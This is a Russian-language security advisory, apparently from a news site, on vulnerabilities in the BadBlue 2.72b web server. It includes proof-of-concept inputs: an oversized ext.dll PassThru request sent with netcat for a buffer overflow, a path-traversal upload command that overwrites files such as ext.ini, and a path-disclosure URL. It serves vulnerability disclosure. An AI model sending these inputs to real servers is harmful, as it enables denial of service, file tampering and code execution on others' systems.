Программа: BadBlue 2.72b

Найденные уязвимости позволяют удаленному злоумышленнику перезаписать
произвольные файлы, получить доступ к конфиденциальной информации, осуществить
DoS атаку и выполнить произвольный код на целевой системе.

1) Уязвимость возникает из-за ошибки в проверке входных данных в URI при
вызове команды PassThru из ext.dll и копировании их в буфер 4096 байт. Атакующий
может передать специально составленный URI, что приведет к переполнению буфера.

Пример:

http://aluigi.org/poc/badbluebof.txt

nc SERVER 80 -v -v < badbluebof.txt

> badbluebof.txt

GET /ext.dll?mfcisapicommand=PassThru&aaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaa . . . aaa
HTTP/1.0

2) Уязвимость возникает из-за ошибки в проверке входных данных при загрузке
файлов на сервер. Атакующий может перезаписать произвольные файлы на целевой
системе, включая ext.ini, содержащий конфигурацию сервера.

Пример:


http://aluigi.org/testz/myhttpup.zip


http://milw0rm.com/sploits/2007-myhttpup.zip

myhttpup http://SERVER/upload.dll file.txt ../../file.txt filedata0

3) Уязвимость возникает из-за ошибки в проверке входных данных при
использовании параметра "?&browse=". Атакующий может использовать параметр "?&browse="
на несуществующей директории, что позволит получить полный путь к Web серверу.

Пример:

http://SERVER/blah/?&browse=

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии